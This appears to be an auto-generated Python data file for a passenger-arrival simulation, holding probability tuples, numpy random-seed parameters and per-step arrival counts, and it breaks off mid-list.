(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 140
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 141
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 142
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 143
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 144
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 145
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 146
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 147
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 148
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 149
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 150
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 151
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 152
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 153
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 154
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 155
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 156
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 157
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 158
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 159
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 160
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 161
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 162
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 163
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 164
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 165
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 166
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 167
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 168
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 169
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 170
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 171
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 172
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 173
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 174
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 175
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 176
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 177
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 178
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 179
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 8991598675325360468762009371570610170
#index for seed sequence child
child_seed_index = (
1, # 0
8, # 1
)
| """
PASSENGERS
"""
num_passengers = 30585
passenger_arriving = ((6, 7, 5, 12, 5, 4, 3, 0, 3, 0, 0, 1, 0, 12, 9, 9, 3, 5, 2, 3, 2, 3, 0, 1, 2, 0), (8, 12, 2, 2, 8, 3, 3, 1, 2, 2, 1, 0, 0, 14, 10, 7, 6, 5, 4, 4, 3, 6, 3, 2, 2, 0), (7, 11, 10, 8, 6, 2, 4, 4, 5, 1, 2, 1, 0, 10, 7, 6, 9, 7, 5, 3, 4, 4, 4, 0, 1, 0), (7, 6, 11, 15, 6, 4, 4, 5, 3, 2, 2, 2, 0, 10, 10, 5, 5, 12, 3, 7, 2, 2, 4, 0, 0, 0), (10, 13, 11, 9, 8, 6, 5, 2, 1, 2, 0, 0, 0, 9, 3, 2, 6, 8, 8, 5, 6, 4, 3, 4, 0, 0), (14, 10, 13, 8, 8, 5, 7, 4, 4, 1, 1, 2, 0, 9, 10, 7, 4, 10, 6, 2, 4, 3, 1, 1, 0, 0), (16, 7, 7, 8, 9, 7, 6, 1, 5, 1, 2, 1, 0, 8, 9, 7, 6, 4, 4, 4, 5, 5, 3, 1, 0, 0), (21, 23, 5, 12, 8, 6, 4, 5, 2, 1, 2, 1, 0, 10, 7, 3, 8, 10, 5, 10, 5, 4, 6, 2, 0, 0), (14, 16, 9, 13, 4, 5, 4, 5, 7, 2, 3, 0, 0, 18, 13, 8, 9, 10, 6, 2, 6, 3, 3, 2, 0, 0), (15, 18, 14, 13, 12, 7, 4, 6, 8, 1, 0, 0, 0, 16, 6, 13, 7, 3, 8, 4, 2, 8, 6, 1, 0, 0), (17, 15, 10, 12, 4, 2, 5, 5, 4, 6, 4, 2, 0, 13, 11, 6, 10, 11, 6, 9, 3, 6, 4, 4, 3, 0), (12, 13, 12, 15, 19, 6, 6, 7, 8, 2, 1, 0, 0, 23, 8, 10, 12, 12, 5, 5, 3, 3, 5, 0, 1, 0), (10, 19, 7, 10, 10, 5, 5, 7, 6, 3, 1, 0, 0, 14, 10, 11, 5, 16, 4, 7, 9, 3, 6, 2, 0, 0), (15, 11, 15, 7, 10, 4, 8, 5, 4, 2, 2, 1, 0, 11, 14, 8, 9, 8, 7, 7, 4, 7, 2, 1, 1, 0), (15, 8, 13, 18, 10, 6, 9, 6, 7, 2, 5, 1, 0, 10, 18, 9, 7, 11, 9, 7, 3, 7, 4, 2, 1, 0), (10, 19, 6, 14, 12, 8, 8, 13, 9, 3, 3, 3, 0, 12, 6, 9, 9, 10, 7, 10, 3, 6, 3, 0, 0, 0), (7, 22, 12, 12, 9, 4, 8, 0, 4, 5, 2, 2, 0, 18, 9, 17, 9, 14, 12, 5, 6, 8, 3, 3, 1, 0), (18, 5, 12, 15, 9, 2, 10, 4, 7, 2, 5, 0, 0, 15, 13, 14, 14, 16, 9, 12, 6, 2, 8, 1, 2, 0), (22, 15, 12, 16, 11, 10, 3, 4, 8, 5, 2, 2, 0, 11, 13, 13, 6, 16, 7, 10, 4, 2, 4, 2, 1, 0), (15, 12, 8, 15, 9, 5, 7, 4, 6, 3, 2, 0, 0, 17, 15, 14, 8, 8, 5, 6, 3, 5, 2, 1, 0, 0), (14, 14, 11, 15, 15, 9, 5, 8, 6, 3, 2, 1, 0, 12, 16, 10, 4, 18, 10, 7, 3, 4, 5, 3, 0, 0), (18, 23, 12, 17, 18, 5, 6, 4, 5, 4, 0, 1, 0, 18, 14, 5, 11, 10, 11, 8, 4, 3, 6, 6, 0, 0), (10, 15, 12, 19, 14, 4, 4, 6, 6, 4, 5, 4, 0, 19, 17, 7, 13, 11, 8, 4, 2, 5, 7, 3, 0, 0), (13, 19, 14, 19, 11, 5, 9, 7, 5, 2, 3, 0, 0, 15, 15, 6, 9, 11, 8, 3, 0, 5, 7, 2, 0, 0), (14, 9, 9, 11, 13, 4, 5, 5, 8, 1, 2, 3, 0, 15, 17, 9, 8, 15, 15, 7, 3, 4, 4, 1, 0, 0), (18, 18, 20, 8, 11, 11, 6, 7, 2, 4, 1, 1, 0, 16, 20, 13, 11, 21, 9, 7, 3, 8, 4, 1, 0, 0), (24, 14, 15, 12, 12, 6, 11, 5, 7, 3, 5, 0, 0, 16, 18, 8, 10, 15, 6, 4, 4, 7, 3, 3, 2, 0), (15, 14, 11, 15, 15, 6, 2, 5, 7, 4, 2, 1, 0, 17, 11, 17, 12, 12, 6, 7, 1, 3, 3, 3, 2, 0), (10, 15, 18, 17, 16, 5, 5, 5, 8, 3, 3, 1, 0, 17, 19, 11, 10, 8, 10, 15, 2, 3, 6, 4, 2, 0), (14, 9, 21, 13, 12, 10, 4, 10, 6, 3, 2, 2, 0, 21, 8, 10, 15, 11, 3, 8, 3, 5, 1, 5, 1, 0), (13, 14, 11, 25, 15, 4, 8, 4, 6, 2, 2, 0, 0, 12, 18, 13, 13, 12, 7, 8, 2, 7, 3, 3, 2, 0), (16, 18, 15, 15, 14, 6, 3, 5, 12, 2, 3, 1, 0, 15, 12, 11, 10, 12, 10, 4, 6, 5, 6, 0, 2, 0), (20, 19, 18, 13, 9, 5, 6, 7, 4, 2, 2, 0, 0, 30, 21, 14, 12, 11, 7, 5, 8, 6, 4, 0, 2, 0), (21, 18, 10, 10, 11, 6, 6, 1, 4, 4, 2, 1, 0, 25, 18, 8, 11, 9, 7, 3, 2, 3, 5, 2, 0, 0), (18, 16, 17, 18, 14, 7, 7, 8, 7, 4, 1, 0, 0, 16, 14, 16, 7, 9, 8, 11, 3, 7, 4, 2, 4, 0), (21, 12, 12, 17, 9, 7, 6, 2, 7, 7, 1, 2, 0, 17, 15, 7, 7, 17, 6, 7, 3, 7, 5, 2, 0, 0), (15, 10, 9, 11, 9, 4, 10, 5, 6, 1, 1, 2, 0, 7, 17, 14, 9, 9, 4, 6, 7, 7, 10, 4, 2, 0), (10, 21, 19, 19, 13, 4, 7, 6, 3, 2, 2, 2, 0, 19, 14, 6, 8, 11, 5, 8, 0, 4, 5, 4, 2, 0), (20, 16, 22, 11, 16, 9, 10, 6, 5, 7, 1, 1, 0, 17, 9, 10, 9, 13, 9, 9, 3, 5, 5, 3, 1, 0), (15, 13, 14, 17, 12, 6, 8, 7, 4, 2, 2, 1, 0, 17, 14, 16, 11, 15, 2, 6, 5, 8, 4, 4, 2, 0), (17, 10, 23, 16, 11, 3, 13, 3, 4, 1, 2, 4, 0, 16, 16, 8, 15, 16, 11, 6, 8, 2, 5, 4, 0, 0), (12, 10, 6, 10, 10, 8, 10, 7, 4, 5, 1, 1, 0, 15, 21, 8, 14, 16, 11, 7, 3, 8, 5, 4, 0, 0), (21, 14, 15, 20, 10, 9, 6, 4, 6, 6, 2, 1, 0, 11, 19, 9, 10, 17, 7, 8, 2, 5, 7, 3, 1, 0), (23, 14, 12, 7, 9, 7, 6, 5, 2, 4, 0, 1, 0, 23, 18, 12, 11, 16, 9, 6, 5, 4, 5, 2, 4, 0), (16, 15, 17, 12, 5, 6, 4, 2, 4, 2, 0, 3, 0, 21, 19, 11, 12, 16, 9, 5, 5, 4, 5, 1, 0, 0), (12, 14, 19, 14, 11, 4, 9, 5, 8, 7, 1, 1, 0, 19, 14, 12, 7, 15, 2, 4, 6, 9, 3, 3, 3, 0), (9, 14, 11, 12, 10, 3, 6, 6, 6, 1, 5, 1, 0, 15, 14, 12, 10, 13, 4, 9, 3, 9, 1, 0, 1, 0), (21, 13, 9, 14, 21, 5, 5, 3, 11, 2, 4, 4, 0, 12, 15, 14, 10, 17, 7, 10, 4, 5, 6, 0, 1, 0), (12, 16, 16, 15, 12, 8, 9, 7, 6, 3, 2, 3, 0, 10, 17, 11, 5, 11, 13, 4, 3, 4, 6, 4, 1, 0), (14, 18, 12, 18, 10, 6, 8, 2, 5, 2, 3, 3, 0, 17, 12, 6, 7, 23, 5, 3, 7, 6, 7, 3, 0, 0), (20, 18, 10, 14, 9, 2, 5, 6, 6, 3, 3, 2, 0, 22, 16, 5, 5, 13, 8, 4, 8, 7, 4, 1, 1, 0), (15, 13, 5, 15, 14, 4, 10, 8, 6, 4, 2, 0, 0, 18, 9, 12, 12, 12, 11, 6, 5, 4, 2, 3, 0, 0), (19, 16, 12, 17, 7, 6, 10, 4, 4, 5, 2, 1, 0, 13, 18, 11, 7, 17, 12, 7, 1, 7, 6, 2, 2, 0), (11, 17, 20, 9, 9, 7, 5, 2, 6, 1, 2, 1, 0, 15, 20, 16, 9, 11, 6, 7, 2, 5, 7, 1, 0, 0), (16, 13, 15, 16, 11, 7, 6, 7, 2, 3, 5, 1, 0, 13, 12, 7, 13, 11, 7, 6, 4, 1, 11, 1, 1, 0), (19, 21, 19, 17, 9, 7, 4, 6, 7, 0, 0, 3, 0, 17, 10, 11, 6, 19, 5, 6, 5, 7, 7, 1, 2, 0), (21, 14, 13, 17, 12, 5, 8, 9, 6, 1, 1, 1, 0, 20, 7, 7, 8, 12, 7, 9, 2, 8, 8, 3, 1, 0), (17, 14, 11, 17, 7, 3, 8, 3, 6, 2, 4, 0, 0, 20, 17, 10, 7, 6, 8, 7, 6, 6, 6, 2, 3, 0), (13, 16, 9, 7, 18, 7, 6, 9, 9, 3, 2, 2, 0, 17, 12, 15, 14, 7, 6, 6, 8, 5, 5, 3, 3, 0), (20, 14, 10, 17, 13, 7, 7, 4, 8, 5, 2, 1, 0, 20, 16, 7, 10, 12, 4, 6, 4, 6, 4, 4, 2, 0), (21, 12, 15, 13, 13, 9, 12, 6, 7, 3, 2, 2, 0, 14, 12, 12, 6, 13, 8, 2, 7, 8, 6, 1, 0, 0), (20, 14, 17, 13, 15, 5, 3, 7, 6, 4, 1, 2, 0, 9, 10, 13, 6, 10, 4, 9, 4, 9, 7, 3, 2, 0), (7, 18, 15, 12, 17, 6, 5, 4, 5, 4, 0, 0, 0, 12, 15, 13, 12, 19, 6, 5, 5, 9, 1, 1, 2, 0), (21, 14, 14, 17, 15, 5, 12, 4, 10, 2, 4, 0, 0, 16, 12, 6, 11, 14, 2, 8, 5, 9, 8, 6, 3, 0), (26, 17, 18, 20, 7, 8, 10, 5, 8, 2, 0, 2, 0, 20, 19, 6, 9, 9, 8, 4, 4, 6, 3, 3, 3, 0), (19, 14, 15, 21, 10, 8, 5, 2, 8, 4, 2, 1, 0, 15, 18, 13, 9, 11, 7, 8, 1, 3, 5, 1, 1, 0), (19, 16, 10, 15, 8, 4, 7, 6, 8, 3, 2, 1, 0, 30, 13, 8, 9, 10, 13, 4, 5, 4, 4, 6, 1, 0), (9, 9, 13, 21, 13, 11, 5, 3, 4, 1, 2, 2, 0, 13, 19, 14, 7, 13, 8, 4, 3, 8, 3, 2, 2, 0), (9, 15, 12, 23, 12, 2, 5, 12, 9, 4, 1, 1, 0, 14, 12, 9, 8, 12, 8, 3, 4, 0, 5, 3, 1, 0), (16, 14, 9, 13, 16, 6, 6, 4, 5, 6, 2, 1, 